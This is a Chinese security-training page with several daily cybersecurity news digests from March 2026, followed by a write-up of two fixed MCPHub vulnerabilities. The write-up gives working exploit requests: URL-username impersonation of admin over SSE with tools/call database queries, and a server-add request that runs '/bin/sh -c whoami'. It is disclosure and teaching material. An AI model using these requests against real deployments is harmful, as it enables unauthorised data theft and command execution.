https://www.anquanke.com/post/id/315140 知名 WordPress 网页无障碍易用性插件Ally被曝出高危 SQL 注入漏洞。该插件活跃安装量超40 万,巨大的覆盖范围使其成为未授权攻击者窃取敏感数据库的重点目标。
6、HPE发布Aruba OS高危漏洞预警 可未授权重置密码
https://www.anquanke.com/post/id/315148 慧与公司(HPE)向用户发出预警,其Aruba OS存在一处高危漏洞(CVE-2023-38493),攻击者可在未授权情况下重置网关、控制器等网络设备的密码,进而可能导致网络被入侵。机构用户应尽快升级至 8.10.0.7 及以上版本,并严格限制设备管理面访问权限。
7、GitLab发布紧急安全更新 修复高危XSS与API拒绝服务漏洞
https://www.anquanke.com/post/id/315155 GitLab 面向社区版(CE)与企业版(EE)发布关键安全更新,涉及版本 18.9.2、18.8.6、18.7.6。此次紧急补丁修复了多处高危漏洞,可防范账号被盗、服务中断与未授权数据篡改等风险。
8、泛微E-cology10存在远程代码执行漏洞
https://www.secrss.com/articles/88568 近日,奇安信CERT监测到官方修复泛微E-cology10 远程代码执行漏洞(QVD-2026-14149),未经身份验证的远程攻击者可利用该漏洞向特定接口发送恶意请求,在目标服务器上执行任意代码,进而获取服务器权限。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
9、174 个漏洞被RondoDox 僵尸网络利用
https://www.securityweek.com/rondodox-botnet-targeted-174-vulnerabilities/ RondoDox 僵尸网络的开发者已显著增加了他们的漏洞利用列表,并采取了更具针对性的利用策略,该僵尸网络的漏洞利用列表已扩展到 174 个不同的漏洞。
10、谷歌、Meta、微软等公司签署协议共同打击网络诈骗
https://www.securityweek.com/google-meta-microsoft-among-signatories-of-pact-to-combat-scams/ 主要科技和零售公司于周一宣布,他们已签署一项旨在打击网络诈骗和欺诈的协议。承诺支持该倡议的公司名单包括 Google、Meta、Microsoft、Adobe、Amazon、OpenAI、LinkedIn、Pinterest、Match Group(Tinder 和 OKCupid 的所有者)、Levi Strauss 和 Target。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月17日
1、研究人员发现新型僵尸网络KadNap
https://blog.lumen.com/silence-of-the-hops-the-kadnap-botnet/ 研究人员发现了一种名为KadNap的新型僵尸网络,其主要针对华硕路由器进行攻击,构建僵尸网络,用于转发恶意流量。自2025年8月以来,受感染设备已超过14000台。KadNap采用了定制版的Kademlia分布式哈希表协议。该协议通常用于P2P系统,攻击者借此在P2P网络中隐藏其基础设施的IP地址,以规避传统的网络监控。一旦设备被并入网络,这些僵尸节点就会通过名为Doppelganger的代理服务进行销售。
2、攻击者针对FortiGate进行攻击
https://www.sentinelone.com/blog/fortigate-edge-intrusions/ 在2026年初,研究人员处理了多起安全事件。在这些事件中,FortiGate下一代防火墙设备遭到入侵,被攻击者用作进入目标环境的立足点。在研究人员调查期间,Fortinet已披露并修复了多个允许未经授权访问的高危漏洞。成功利用这些漏洞后,攻击者可以从FortiGate设备中提取配置文件,其中通常包含服务账户凭据以及目标环境极具价值的网络拓扑信息。
3、研究人员在LangSmith中发现安全漏洞
https://cybersecuritynews.com/critical-langsmith-account-takeover-vulnerability/ 研究人员在LangSmith中发现了一个编号为CVE-2026-25750的安全漏洞。该漏洞使用户面临令牌被窃取以及账户被完全接管的风险。作为大语言模型数据调试和监控的核心枢纽,LangSmith每天处理数十亿条事件。对于企业级AI环境而言,这是一个风险极高的安全漏洞。该漏洞源于LangSmith Studio内部的一个不安全的API配置功能。平台使用了一个灵活的baseUrl参数,允许开发人员引导其前端应用从不同的后端API获取数
4、Nginx UI中存在一个高危漏洞
https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html Nginx UI中存在一个编号为CVE-2026-27944的关键漏洞(CVSS评分9.8)。该漏洞允许攻击者在未经身份验证的情况下下载并解密完整的服务器备份。对于将管理界面暴露在公网上的组织而言,此漏洞构成了严重风险,可能导致敏感配置数据、凭据和加密密钥泄露。目前,该漏洞的概念验证(PoC)代码已随公告发布。
5、纽约市立医院确认一起数据泄露事件
https://healthexec.com/topics/health-it/cybersecurity/data-breach-care-management-company-impacts-5k-patients-nyc-health 纽约市立医院的一家护理管理合作伙伴近期遭遇了数据安全事件。经确认,该事件为第三方未经授权访问导致的数据泄露,部分患者的数据记录遭到泄露。纽约市立医院在声明中表示,国家药物滥用计划协会(NADAP)是此次网络攻击的受害者。NADAP主要为过去或现在饱受药物滥用及依赖困扰的个人提供护理协调服务。此次攻击发生在2025年11月,泄露了5086名患者的记录。纽约
6、塞浦路斯多个网站遭DDoS攻击
https://in-cyprus.philenews.com/local/ddos-attacks-hit-cyprus-websites-commissioner-says-live/ 塞浦路斯通信专员表示,最近几天塞浦路斯境内数个网站遭到了网络攻击,但他将这些事件描述为最常见且危险性最低的攻击类型,并指出受影响的网站遭到了分布式拒绝服务(DDoS)攻击。该专员表示,遭受攻击的目标网站类型多样,并不局限于政府页面,因此无法得出国家本身被针对的结论,目前尚未发现明显的攻击规律。
7、微软将禁用Win 11和Server 2025自动安装功能以应对高危RCE漏洞
https://cybersecuritynews.com/windows-11-and-server-2025-automated-installation/ 微软将分两阶段禁用Windows部署服务的无人值守功能,因高危漏洞CVE-2026-0386允许攻击者拦截配置文件执行恶意代码。建议管理员立即更新系统并迁移至替代方案,2026年4月后将默认禁用该功能。
8、OpenClaw AI Agent漏洞可导致提示词注入攻击与数据窃取
https://thehackernews.com/2026/03/openclaw-ai-agent-flaws-could-enable.html 中国警告开源AI代理OpenClaw存在严重安全隐患,包括提示词注入攻击导致数据泄露、恶意模块执行任意命令等风险,建议加强网络控制和隔离措施,防范关键行业数据泄露和系统瘫痪。
9、微软发布带外补丁修复Win 11中关键RRAS远程代码执行漏洞
https://cybersecuritynews.com/windows-11-out-of-band-update/ 微软紧急发布Windows 11热补丁KB5084597,修复RRAS组件三个高危远程代码执行漏洞(CVE-2026-25172/25173/26111),攻击者可利用恶意服务器控制受害者设备。该更新适用于24H2/25H2版本,无需重启,企业用户需优先部署。
10、微软确认 Win11 24H2/25H2 存在系统盘 C 盘访问阻断漏洞
https://cybersecuritynews.com/windows-11-bug-drive-c/ 微软确认2026年2月更新导致部分三星设备系统盘无法访问,影响Windows 11 25H2/24H2用户,三星Share应用或为诱因。微软与三星正调查,暂未发布修复方案,建议用户等待官方补丁。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月16日
1、苹果发布安全更新修复遭Coruna工具包利用的多个漏洞
https://www.bleepingcomputer.com/news/apple/apple-patches-older-iphones-and-ipads-against-coruna-exploits/ 苹果公司发布了安全更新,旨在保护旧款iPhone和iPad免受一系列漏洞的影响。这些漏洞此前在涉及网络间谍活动和加密货币窃取的Coruna漏洞利用工具包攻击中被多次使用。其中部分安全漏洞早在2023年9月就已在较新iOS型号的更新中得到解决。苹果指出,这些补丁将修复被多个漏洞利用链盯上的iOS安全问题。其中许多漏洞曾被用于零日攻击,旨在帮助攻击者将权限提升至内核级别,或在受影响设备
2、加拿大电信运营商Telus确认遭受网络攻击
https://www.bleepingcomputer.com/news/security/telus-digital-confirms-breach-after-hacker-claims-1-petabyte-data-theft/ Telus Digital证实发生了一起安全事件。此前,攻击者声称在一场持续数月的入侵中,从该公司窃取了接近1PB的数据。此次攻击由名为ShinyHunters的组织实施。该组织声称窃取了与Telus BPO业务相关的广泛客户数据,以及Telus消费者电信部门的通话记录。根据ShinyHunters的说法,他们利用在Salesloft Drift泄露事件中
3、AiLock勒索组织称对英格兰曲棍球协会进行攻击
https://www.bleepingcomputer.com/news/security/england-hockey-investigating-ransomware-data-breach/ 英格兰曲棍球运动的管理机构英格兰曲棍球协会正在调查一起潜在的数据泄露事件。此前,AiLock勒索组织在其数据泄露网站上将其列为受害者。据该组织称,他们从该机构系统中窃取了129GB的数据,并宣称除非支付赎金,否则很快将公开这些文件。英格兰曲棍球协会已获悉该事件,并优先启动了一项由内部团队和外部专家共同参与的调查,以查明事件真相。
4、Storm-2561利用仿冒的V*PN客户端进行窃密活动
https://www.microsoft.com/en-us/security/blog/2026/03/12/storm-2561-uses-seo-poisoning-to-distribute-fake-vpn-clients-for-credential-theft/ 研究人员发现一场凭据窃取攻击活动。该活动通过搜索引擎优化投毒手段分发虚假的VPN客户端。攻击者将用户重定向至恶意的GitHub仓库,该仓库中托管了仿冒的虚假VPN客户端,旨在搜集用户的VPN登录凭据。研究人员将此活动归因于Storm-2561组织。
5、谷歌发布紧急更新修复两个已遭利用的Chrome零日漏洞
https://www.bleepingcomputer.com/news/google/google-fixes-two-new-chrome-zero-days-exploited-in-attacks/ 谷歌发布了紧急安全更新,以修复Chrome浏览器中两个已在零日攻击中被利用的高危漏洞。谷歌在安全公告中表示已发现CVE-2026-3909和CVE-2026-3910的利用程序。第一个零日漏洞(CVE-2026-3909)源于Skia中的一个越界写入漏洞,第二个零日漏洞(CVE-2026-3910)被描述为V8 JavaScript和WebAssembly引擎中的一种不恰当实现漏洞。尽
6、GitLab发布紧急安全更新修复15个安全漏洞
https://cybersecuritynews.com/gitlab-security-update-2/ GitLab已针对其社区版和企业版发布了紧急安全更新,旨在解决广泛的安全漏洞。新发布的18.9.2、18.8.6和18.7.6版本共修复了15个安全问题,其中包括关键的跨站脚本(XSS)和拒绝服务(DoS)漏洞。官方强烈建议私有部署实例的管理员立即应用这些补丁,以维护安全环境。GitLab将在补丁发布30天后,在其议题追踪系统上公开详细的漏洞报告。
7、攻击者通过恶意NPM包传播Cipher窃密木马
https://research.jfrog.com/post/solara-cipher-npm/ 研究人员最近在NPM生态系统中发现了2个恶意软件包,这些包通过Dropbox链接分发名为solara 1.0.0.exe或solara 1.0.1.exe的Windows可执行文件。这些恶意包交付的可执行文件中嵌入了经过混淆处理的JavaScript代码,以及运行该代码所需的所有Node.js模块,旨在窃取受影响用户的信息。该木马在内部自称为Cipher窃密木马(Cipher stealer)。
8、研究人员称AppsFlyer SDK疑似遭供应链攻击
https://profero.io/blog/hijacked-at-the-source-a-trusted-marketing-appsflyers-sdk-distributes-a-crypto-stealer 2026年3月9日,应客户要求,研究人员开始调查一起可能涉及AppsFlyer SDK的安全事件。在调查期间,研究人员确认访问加载AppsFlyer SDK的网站和应用程序的用户,会被交付一段经过混淆、由攻击者控制的JavaScript代码。该事件的全貌、持续时间和根本原因尚未得到验证,目前AppsFlyer官方除提及可用性问题外,尚未对此做出正式确认。
9、Zoom发布安全更新修复多个安全漏洞
https://securityonline.info/unauthenticated-takeover-critical-9-6-cvss-zoom-flaw-exposes-windows-users-to-remote-privilege-escalation/ Zoom近期发布安全公告,详细披露了影响其Windows客户端的4个安全漏洞,其中包括一个被评为Critical级别的漏洞。该漏洞允许未经身份验证的提权,攻击者可能借此执行非法指令、泄露敏感数据,或通过网络及本地访问夺取用户系统的控制权。Zoom官方敦促安全团队立即应用最新更新,以缓解这些高风险威胁。
10、联发科芯片高危漏洞:攻击者可在45秒内窃取安卓手机PIN码
https://cybersecuritynews.com/mediatek-vulnerability-android-phone/ 联发科Dimensity 7300芯片Boot ROM存在硬件级漏洞,攻击者可45秒内窃取PIN码和加密钱包助记词,影响全球25%安卓设备。漏洞无法彻底修复,建议敏感数据转移至专用硬件钱包。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
MCPHub 高危漏洞实录:零凭证访问与授权后命令执行
本文涉及的所有漏洞均已在新版本中修复,仅供安全研究与学习参考。
看到标题,可能会误以为这是一条完整的攻击链——先绕过认证,再执行命令。但实际上两个漏洞没有任何依赖关系,放在一篇文章里面只是因为它们出自同一个项目。
MCPHub 是什么
MCPHub 是一个 MCP 服务器的统一管理中间层。
它解决的问题是:你本地或服务器上可能跑了一堆 MCP 服务,文件系统访问、数据库查询、网络请求……各有各的配置。MCPHub 把它们全部汇聚到一个统一的 SSE 端点,AI 客户端只连一个地址就能调用所有工具。
环境搭建
docker run -p 3000:3000 samanhappy/mcphub
身份认证绕过漏洞
攻击者不需要账号、不需要密码、不需要任何 token,只要把 URL 里的用户名改成想冒充的人,就能获得那个用户的完整权限——调用他配置的所有 MCP 工具,包括查数据库、读文件、调 API。 这个漏洞跟后面讲的命令执行漏洞没有任何关系。它走的是 SSE 长连接这条路,完全绕开了登录流程,不需要 token,也不会触发任何命令执行。
终端一中执行:
curl -N "http://127.0.0.1:3000/admin/sse/test"
终端二中执行:
Invoke-WebRequest -Uri "http://127.0.0.1:3000/admin/messages?sessionId=b4c0771b-decc-4b0f-ab0a-52f0612b2191" `
-Method POST `
-ContentType "application/json" `
-Body '{"jsonrpc":"2.0","id":2,"method":"tools/list","params":{}}'
终端一中接收到请求
admin 配置的工具全部列出来了。接下来就可以直接调用
SSE (Server-Sent Events) 是一种服务器推送技术,允许服务器通过 HTTP 连接持续向客户端推送数据。与传统的请求-响应模式不同,SSE 连接在建立后会保持打开状态,服务器可以随时向客户端发送事件。
MCPHub 的 SSE 接入路由格式是:
GET /{username}/sse/{group}
mcphub-main\/src/middlewares/userContext.ts
从 URL 获取用户名,直接创建用户对象,无任何验证
漏洞根本原因是:
直接信任 URL 参数:系统从 req.params.user 提取用户名,这个值完全由攻击者控制
缺少身份验证:没有检查当前请求是否已认证,没有验证 token、session 或任何凭证
缺少权限验证:没有检查请求者是否有权访问目标用户的资源
直接设置用户上下文:调用 setCurrentUser() 后,系统完全信任这个伪造的身份
sseService.ts 是 MCPHub 的核心传输层服务文件,负责处理客户端与 MCP 服务器之间的所有通信。这个文件包含了 SSE (Server-Sent Events) 连接管理、会话管理、Bearer 认证验证等关键功能。身份验证绕过漏洞正是在这些核心功能中被利用的。
mcphub-main/src/services/sseService.ts
缺少 userId 字段 ,无法验证 session 所有权,任何人只要有 sessionId 就能使用
因为 session 不记录它属于谁,handleSseMessage 处理消息时只判断"这个 sessionId 存不存在",不管"这个 session 是不是你的"。拿到别人的 sessionId 就能直接用。
mcphub-main/src/services/sseService.ts
validateBearerAuth 函数存在严重的认证绕过漏洞。当系统没有配置任何 Bearer keys 时(enabledKeys.length \=\=\= 0,这是默认情况),该函数会直接返回 { valid: true } 允许所有请求通过,完全跳过身份验证。这意味着在大多数未配置 Bearer 认证的 MCPHub 部署环境中,任何人都可以不需要任何凭证就能访问系统。更糟糕的是,即使提供了无效的 Bearer token,只要系统未配置 keys,函数仍然返回认证成功,使得整个认证层形同虚设。
handleSseConnection 函数直接信任并使用了中间件从 URL 参数中提取的用户名,没有验证请求者是否真的是该用户。攻击者只需在 URL 中指定任意用户名(如 /admin/sse/test),中间件就会将 'admin' 设置为当前用户上下文,然后 handleSseConnection 使用这个伪造的用户名构造消息路径 /admin/messages 并创建属于该用户的 SSE transport。整个过程中没有检查 URL 中的用户名是否与实际认证的用户匹配,导致攻击者可以伪装成任意用户获取其完整权限。
handleSseMessage 函数在处理消息时只验证 sessionId 是否存在于全局 transports 对象中,但不验证该 session 是否属于当前请求的用户。由于 SessionContext 接口缺少 userId 字段,系统无法追踪每个 session 的所有者。这导致攻击者只要知道任何有效的 sessionId,就可以通过构造请求 POST /admin/messages?sessionId\=xxx 来使用该 session 执行操作,即使这个 session 实际上属于其他用户。配合前两个漏洞,攻击者可以先伪装成 admin 获取 sessionId,然后持续使用该
步骤 1:客户端建立 SSE 连接
客户端向服务器发送 GET 请求,请求头包含 Accept: text/event-stream
GET /admin/sse/test HTTP/1.1
Host: 127.0.0.1:3000
Accept: text/event-stream
Connection: keep-alive
注意:Connection 必须是 keep-alive 或不设置,
如果设置为 close 会导致连接立即断开!
步骤 2:服务器返回 sessionId 并保持连接
服务器返回 200 OK,Content-Type: text/event-stream,并通过事件流推送 sessionId
HTTP/1.1 200 OK
Content-Type: text/event-stream
event: endpoint
data: /admin/messages?sessionId=5b242344-ddf1-4c21-b8f4-0193d3467f1e
关键点:此时 SSE 连接并未关闭,而是保持打开状态,等待后续事件推送。
步骤 3:使用 sessionId 发送消息
客户端使用获取到的 sessionId 发送 JSON-RPC 消息(通过另一个 HTTP POST 请求)
POST /admin/messages?sessionId=5b242344-ddf1-4c21-b8f4-0193d3467f1e HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
{"jsonrpc":"2.0","id":2,"method":"tools/list","params":{}}
步骤 4:服务器通过 SSE 连接返回响应
event: message
data: {"result":{"tools":[]},"jsonrpc":"2.0","id":2}
漏洞危害
假设 admin 用户配置了一个访问公司数据库的 MCP 工具:
// 1. 伪装成 admin
GET /admin/sse/company-db
// 2. 列出工具
POST /admin/messages?sessionId\=xxx
{"method": "tools/list"}
// 响应:
{
"tools": [
{
"name": "query_customer_data",
"description": "查询客户数据库"
}
]
}
// 3. 执行工具窃取数据
POST /admin/messages?sessionId=xxx
{
"method": "tools/call",
"params": {
"name": "query_customer_data",
"arguments": {
"query": "SELECT * FROM customers"
}
}
}
// 结果:获取所有客户信息
validateBearerAuth 的逻辑已经改了。现在当 enableBearerAuth 为 true 且没有配置 key 时,不再直接放行,而是尝试验证 OAuth token,验证失败就拒绝:
授权命令执行漏洞
必须先登录,必须有合法的 admin token 。/api/servers 接口用的是标准的 JWT 认证,不是 SSE 那套逻辑,漏洞一的 URL 用户名伪造对这个接口完全没用。
漏洞一能冒充 admin,然后利用漏洞二执行命令?不行。因为冒充 admin 只是在 SSE 连接里设置了用户上下文,这个上下文不会转化成 JWT token,/api/servers 该要 token 还是要 token,两条路径互不相通。
MCPHub 支持 stdio 类型的 MCP 服务器,本质是在本机启动一个子进程,用标准输入输出通信。问题在于添加服务器时,对 command 和 args 字段没有任何验证,你填 /bin/sh 加任意参数,服务器就会老实执行。
构造数据包进行登录 获取 token 值
POST /api/auth/login HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 42
accept-language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
content-type: application/json
Accept: */*
Origin: http://localhost:3000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/login
Accept-Encoding: gzip, deflate
Cookie: i18next=en
Connection: close
{"username":"admin","password":"admin123"}
利用登录后的 token 构造数据包
POST /api/servers HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 105
accept-language: en
x-auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoiYWRtaW4iLCJpc0FkbWluIjp0cnVlfSwiaWF0IjoxNzcwMzYxNTAzLCJleHAiOjE3NzA0NDc5MDN9.rTpSwQ8dKOrfYndjcVIe04kXaG8aKMN6kSvU1FPX_IM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
content-type: application/json
Accept: */*
Origin: http://localhost:3000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/login
Accept-Encoding: gzip, deflate
Cookie: i18next=en
Connection: close
{"name":"rce_test","config":{"type":"stdio","command":"/bin/sh","args":["-c","whoami > /tmp/pwned.txt"]}}
mcphub-main/src/controllers/serverController.ts
直接接受用户输入:直接从请求体中获取 config 对象,攻击者完全控制该对象的所有字段,包括 command、agrs 和 env。
仅验证字段存在性:只检查 config.command 和 config.args 是否存在,不验证 command 是否在白名单中,不检查 args 是否包含危险字符串或者命令注入尝试,不限制可执行文件的路径。
类型验证不足:允许 stdio 类型,但没有对其进行任何特殊的安全检查,例如命令白名单或参数过滤。
未经过滤直接传递:未经过滤的恶意配置直接传递到服务层
mcphub-main/src/services/mcpService.ts
直接保存到数据库,没有任何安全检查:直接将未验证的 config 保存到数据库,没有任何命令或参数的安全检查,没有调用任何验证函数
命令字段无验证:conf.command 可以是任意可执行文件路径,如 /bin/sh、/bin/bash、curl 等
参数字段无过滤:conf.args 可以包含任意参数,包括 shell 元字符和命令注入载荷
StdioClientTransport 直接创建子进程:底层使用 Node.js 的child_process.spawn(),直接执行攻击者控制的命令
mcphub-main/src/services/mcpService.ts
一旦恶意服务器配置被保存到数据库,系统会自动调用 createTransportFromConfig 创建传输、在创建 StdioClientTransport 时启动子进程、攻击者的恶意命令被自动执行。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

